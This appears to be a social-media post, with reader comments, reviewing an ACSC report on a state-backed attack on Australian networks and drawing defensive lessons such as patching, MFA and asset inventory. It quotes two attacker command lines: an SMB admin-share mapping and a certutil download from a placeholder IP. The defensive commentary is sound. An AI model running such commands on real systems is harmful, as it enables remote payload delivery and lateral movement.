Analyzing the ACSC Report on Australian Attack
Great write up by the ACSC. It was actually very enlightening to see an actual attack evolve and get analysed using the MITRE ATT&CK framework allowing us to visualize the attack.
When the news had first come out yesterday, I had thought it to be a DDoS kind of campaign, but as I read through this wonderful analysis by ACSC, I realized how big this really was.
I took the liberty of mapping the techniques seen during this attack on the ATT&CK framework. There are definitely some interesting observations, especially related to use of common public exploits and living off the land.
- Nation state actors targeting another nation state using public exploits and not dropping zero days by the hour? That’s one myth busted again.
- Nation state actors using boring techniques like credential harvesting to move laterally and remain undetected? That can’t be right. Right?
- When CVE-2019-18935 came out, it made a lot of noise last year, especially since Telerik UI is popularly used in web applications. Same is the case with CVE-2019-19781. Easy exploitation of unpatched and vulnerable Citrix servers made a lot of noise when this CVE was discovered but I guess patching is not exciting.
- It’s 2020 and the best way to manage passwords is storing them in clear text in Excel files. Right? Attackers found clear text passwords in password spreadsheets as well as passwords stored in emails.
- How many times have attackers moved laterally using SMB traffic, e.g. net use x: \hostname\c$? Oh, the dangers of a flat network. Network segmentation FTW!
- Using remote file copy for lateral movement aka certutil.exe -urlcache -split -f https://192.0.2.1:443/x.php c:\x.txt? That was something interesting.
- Exfiltration using alternate protocols and using C2 channels. Ensuring visibility of outgoing network traffic and proxying it should help here.
- ACSC recommends patching, MFA, event logging and monitoring for defending against nation state actors. They can’t be serious. There’s no machine learning there. Right? It’s those mundane boring stuff that actually protects best.
Hats off to ACSC for being able to analyze the TTPs in such depths so early. There's great learnings here. How many enterprises, when faced with such a determined adversary can protect itself? Very few, I guess. Many of the shortcomings listed here such as not patching or susceptible to spear phishing etc. are extremely common everywhere. All it needs is one determined attacker.
We need to go back to basics. The CIS Top 20 Controls have gone through many iterations but one thing has not changed since the very beginning. The Top 2 controls are asset inventory of all hardware and software. Almost every other security control depends upon it. If we are incapable of implementing these two controls well, everything else (irrespective of the next gen tag) will be sub optimal.
Implementing MFA is another game changer, especially considering authentication and authorization look very different in modern cloud era. Even the most basic MFA can help reduce the attack surface greatly.
Cyber Security Strategist | Thought Leadership | Applied Crypto Expert | Chevening Cyber Fellow | Advisor & Mentor
4 年Summary of report is here https://www.cyber.gov.au/threats/summary-of-tradecraft-trends-for-2019-20-tactics-techniques-and-procedures-used-to-target-australian-networks
Information Technology, Cyber Security Transformation Evangelist | Ex- Indian Navy
4 年Sir Could you share the link to the ACSC report, unable to findnit
Cybersecurity Professional | OT and IoT
4 年Informative ????
??10 K Followers ??Cyber Security Leader -SANS GICSP | CISO |HIPAA |Azure | Cloud PT | AWS? |Industry 4.0| ??Views Expressed are my own??Artificial Intelligence
4 年Cdr Sanjeev Singh (Retd) Nice Article. Mapping is really small to read.Could you please share it in excel or via drive
Cyber Security Professional
4 年The report by ACSC is really very detailed and well investigated and documented. It was a pleasure to read that followed by your insights. Thanks.